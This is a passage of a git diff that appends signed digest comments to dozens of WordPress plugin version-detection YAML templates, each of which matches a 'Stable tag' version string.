a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..a0c38adbb0 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d9d4d0eb9426af71942ccfa63fc994d46963363319d0971b1d7588cb75df216022100b425e3dc4f65456144090c2b15b884b8bd6b88cdf9f1e8b7cdff6493818c475e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..bf7f6ec236 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ad10bfe660f91b172c719c40ffb682f01a46b15987159936550d36948c9721c022100ebb151cf132a6ed6e0dc6dc97dfa10bc6e64e98c1a6ba72e839ead192d6bda55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..05f5ec39b2 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086feb0204ac04afadba8228f0b4a7c3dcc2292186c04ad6f6b928723a3b0e3c102202ac17eddf32a40c3d63c28bd091bd0e154912ca4b04526f6eaf14d9f0776c2ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..c627fd5379 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abbc2510f0a1126b7923b87f52b320bbf8d421b651d9617d730f3c9c7f29d23d0221008a0da7e310f96e046cc33528a9e6df8201695c89fc7abe659fc1d33e98ea14ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..4d95528496 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051857ef48e3ec8d7c74fc4c749c09ce190fc628d26a8d6d15c9b59745522b805022029dd6b2cbb96aa9b041f2a3e293cd78fb2d1a997a2f0b394b180f96969c3146e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..775b5b3246 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210095938ec5c041f2d7c0eb81954b86f6d727f7c279f375c424950327796dfb8fe2022100e0d09ca930b576922adf225cc9c226296fda96ec58f3876846ae030344ed3721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..35976b9382 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf8fa4e0955ff6eb6f2fe3c0a0d4ebd1d0c4a82a35d742d61114f722aa4f7a1d02203852e005949329b5b7dd5891c37692a174c07034511b58683a167e25c9f35c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..6f2b7b1a32 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d57faa6188a0f7d57e619bf96bd01605d5fb2dcdeab1e3f49e546dce6f6c2ca022100a01e21478aa16f73c384db4b090d24846d8f96520a519bf6d3166f68469566aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..8d53492cf4 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073f5c0e331727c6a1905a2b28027ca9020d5b8b37699d5df9021db670ed7ac7c022100b15e4a7b07c133d59f863c923d88dba370ad2fb5e56351815584bf49370f150f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..8c0a21a152 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c30041bd049f37d0c364e6935fed4a3f5ce920c7d86bf133c350d91d87523146022100a5773e1cab41eca6d023258ee57abb1e2a9168c1e3a56bd5c3f41dc48e1c55a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..b9769381ec 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100adc8a2cf592869ed487a1fb947710f20443fdf487593de6e5133454c850e3b02022100a4880f20dc902641f6979ae45ac8f05679f99074bbd3a449b40cad61bb296fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..cb73250c01 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009637cbeaa090118a50e293d39ef8f97ebbcd9681d0f3938ecd40b8a1ae5cd1f3022100ab83ce413250eefbdf6cfaf757049acbd0d9b8164863a9aed21219ed08d8ecb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index fea9594fa0..291bdbdc2a 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022020648ac9951ed8eba8f5655a52c99264ea96fbb8c1d6318cf6ade17b6a3b8c7c022047bfe2c4399a1fbe778e749453ab700d4c1216dfedbac1a272d72692ba750b02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..8486b0c1fc 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100de43accfc7289840d303816f4f0c7a8f71b85356f07479cacd23b32bc8f6f5e7022100fc4d6b5222e346ee86ff2fd77f3a30ce676c3bd850e16f17888f93a026fa61c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..87acaa7910 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013d79193ece3c070a35a1e3255a08841870f696717da1688c98d4f4e25cc3e0c022100caa2c0df1c99a056fedc91908c8dd74d39e2f93f18a008b41e2d34a2953d2558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..7e5f0a828f 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd2d320ec0d86e1d53a7c69cdafff5f206aefdeed121cf864ac1eec968ec9d53022100bee3a34523590fff2c086af5f79082a05a0da63f357beb93e282de39e9137e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..4a04aedfc9 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220261c67c0677a69db97127be7ca9fd49343a150e92168106d2404d094d5b8c514022100c88c93c5be623a8fe9ba25a29c6fd98b7673ee73bedbc9a18bd1f88887091a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..c9c4828fb8 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081a78f389996f845611116868cd9cddf56af3fc87fde9823df99abee90e3c1ce0221009377e3741ac1256a51b672df123cc5467f5b2be23f2aea6c4156dbda961a9f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..d178038411 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f3a9230c154cd277da82c02e72a9da4a8dccc22f11acacedea83279fd1755d7022100fe1cc055be3e13ee3e6c9c8cf46e584cfcb1c151d1d8578488b76aae76076257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..24e9c23937 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f16a9adf5a06cb498fb365b487a6acb5aa9ed5e8ee7960a4af629ae6d68a608f02201b1989d45857ee1de1c14dd3d33c5f689340874440b3ab5dd55bb3196ade3084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..9641f2cf3b 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020a2f0b9a7e7e0c18f9f49eb80b0f0d9dc9f3918a2e8b64076f42a96f829934402210085f26929c1944a5b942506ad59d2028171787095e5e95d0c7599da43643bb848:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..2c6e3327df 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100916cadaba2ceac8fabcc182d31c8330c04ec374be98883a7744b810357e212b1022063d9af6544ae947046f7c26927dc18a42dc9d61021b085c3cdae76e07496f69d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..443df2f89f 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022026e7858d6fa8770c7677abdfef5ac41a0ded3aafad18bf9c3bfa1a4d2d0944a1022100f63309452a35fd9bf24edef9c6e3faf7695b3eceaa6a635e0e4385caffad3d3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..a5b55aa942 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9decc1bf230c97329d43542f2573866eb92f42c38df38677bcd77fcdb3191540221008e0fadbc0dbbb0e66621b86018154f3cf49f3413e6e64ee5c7551d1bc634c7af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..91f3246a7a 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201139b26146e69444fff4fb38f506ff06be439388834bcc51f20fcf64a18183a30220439a8e80e511372773c4c07ff9bdd35de0dd1f0c04c1f712981e599ae34ff9c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..b47131e477 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204bd054e30dd0e7255682dc97834640967198ddf039bbe5cfe4c0e0263bbc33b802204cc9eba8f92a1020a3bc8baa6ff0f619e1155f29e7c5db2ecea3530d29539012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..aad8b5b5f4 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4fca3680e7e3a60315ed52fa42f44da14b270b80e7689d62ddbb611120bedee02210094d14104618a17e95ebd8f9f16c9cbe8507be44eb8b2bb030e3f038e317df0a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..a4a58437b9 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021bb1ed2b98330278a1db8e0428de43969270258439f63be8e9b11c0a9cb832f02202e535ae45d971123633a1a8f777975981cfaf2f20307ede5e4073ca5024bba72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..699eb43cc9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220488e2e9a821c197bffc150358927d0ff580823387403bd93f06208d41083e50502201f39ccacf2d7b9f3570860e65dd70552a0b5ef5bc3741abf1e2be4fa2a66eabd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..e0f968dbe0 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017bb9bccf7ab72fad6693d7a991456188192e2ee8ddd00d5a45c0091df68900902204e6af33aa338ae39905c20c554e711e9928b2ea420eb756e5fadbf6109249058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..49445adaac 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e568080ae859331a241d5707255fd9f3c91574b7b81238e85993dfef445936c022075292c025ea1b2492d06f7331008e9927e2a79f9c50b2c9965080caa5023c287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..f4f57be1a3 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020543a53c72f5880a540fc832516032f98404c2ca74c807c5d7686d881bfc068022100fbd84b4b27bb04814b079e1f05f86d4a67e3f8761167aade993bbb7ca07c90f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..da6ae9faa3 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a497b2e2174453bfa7e98ddb7bfcd69f34a7b4e50b8c8a17d0be7ac7b2290a10220216a1c7bd29f28dab14bc5cdf5cdcd1f859a7e3f42a8cce8d7b4fcd77287959f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..f37eaaf14d 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049f81360fa8b6e30f5b3c7e4a05a8eb7dbb8379d15f4fab2d88332a24342ceed022100c084637a8c567af7b19f559a6520d589eef4c0b64cdb4a7432ea67e564a3a547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..1dccee59d3 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a81a53b2cef431f752b830033be70142f88f7cdf17c3f9e9ea4eb4b0ea43a5da02205c7b27a4f0c51985842ef0fce582a32208b1874b0d6aa960332a544dc5d7c399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..b6181aa88f 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f58819c6b7178a5b8da9fd7b04fbc0ce4e3d5e44373aa5053f812ab68cba5386022100a9b3e45eca9ad304fbfd7ed84347afde20b95ca0385ce07b02fb2f7ea507beff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..f39789278f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0a783ee86f0be25d4aa179e60c7cc3f82d358f86af092bddd86ce876b4ce31d022100c9a88442be0a1c518dc2cfec462ca41c5ba15facbeabf14d82bea65f763d0966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..e76b57e3cf 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f07a21b9c4bc8dda7aca7603c864acc7cc620883f606efe856b7ba298c21134e02205c6d054894100b04c103c3358a0d0f49cdf9b214695f05d2d2efce78842360c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..b8b8cfbb15 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3f884ef83103643dd31fac505bb5d2758ce93c149f6c779cde611c6e0b17ebf02201af78e46213bc4b314ff8619d85aa13584a1a27c4e2e26515f1ea18336212051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..09c6aa96c9 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9ff72b81c3afbb2de29f4b49572be3382df5b61817af86c9336228e9f539072022022a59d6f3d7bf5791870cbd16daeb1d12268dc32394b44200a97b4f3ea9d6a64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..b0c80e19d0 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e31c0947e4eef2630c6a8d3cad7d20923ce67d19b462f1a5830a6d9b574be43502206dfa683c1b5c7e3ff13e81b49a426eab8a35f97de696c26641948813b779abc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..3cf64da98b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0fa7e1c707328e5f2cd2663efdcd52efac8b9496fd94e42efae46b28781d090022100beb12acd075cedd9b3a25db7481bb76b0473d6cc224fe6fa9ddd8bf81c50cc01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..382159b19b 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009bed3548dafb9ce92ec55a6e3bff28e76aafc6710bc58e9d5ffa28236f47c150220687a2f02b78920e96144bfbc2b0eeaa63dae158fa261194b1cd0ff52205ad315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..ac5b5ab70c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7ec8b421228f82fcecf616289b74a76e32631e6252f6a8e3751e39ad475ffba02201d01e9bef0d4b3d2d81778186c89024d2a6f5ba7c6d7db11bc4185e34db01ee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..82a144eba6 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c09b450bc72ccdb8ca35dc75188602d2dcbfbd9709b6ad20104d451945b320d02210091f4091cae2bc13144d8f54ecc44101901d36d31b089dc129db4d743753fd0de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..844f637b44 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009906db1201174085cfe588d8b25e14754de2519a1719f91324e4b3d48ff344880221008b12be7193e7d7ae0b5bd578b79258c7eb358a39adf7c07d3f68aa32770d3794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..4bb5918220 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220229ad1a430f18a2613afae1a418e6b3d8ebdcfc006c85e027765d0e3eddffbdd022100c0cab0195e0b31d511a50ec7f1ce386d281fa3fa30da9050fab7e037a701dd45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..288166a9a0 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 